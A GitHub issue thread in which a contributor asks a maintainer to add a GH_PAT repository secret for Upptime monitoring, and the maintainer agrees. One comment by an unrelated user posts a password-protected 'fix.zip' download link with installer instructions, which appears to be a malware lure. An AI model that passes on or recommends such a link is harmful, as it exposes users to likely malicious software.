### ISSUE TITLE
Add GH_PAT to repository secret

### ISSUE THREAD

**Issue by chartgerink** [STAPLE-verse/uptime#1]
@doomlab - would you mind helping me add the relevant repository secret? The steps are outlined here – I cannot add this as I don't have the right organization permissions.

https://upptime.js.org/docs/get-started/#add-repository-secrets

After this is completed, I will do the configuration of the monitor 👍

**Comment by wahyu-n** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by doomlab** [comment]
Can do! I just need a few days to deal with a few other things.

From: Chris Hartgerink ***@***.***>
Date: Thursday, August 29, 2024 at 10:55 AM
To: STAPLE-verse/uptime ***@***.***>
Cc: The Doom Lab ***@***.***>, Mention ***@***.***>
Subject: [STAPLE-verse/uptime] Add GH_PAT to repository secret (Issue #1)

@doomlab<https://github.com/doomlab> - would you mind helping me add the relevant repository secret? The steps are outlined here – I cannot add this as I don't have the right organization permissions.

https://upptime.js.org/docs/get-started/#add-repository-secrets

After this is completed, I will do the configuration of the monitor 👍

**Comment by chartgerink** [comment]
Completed 🙌
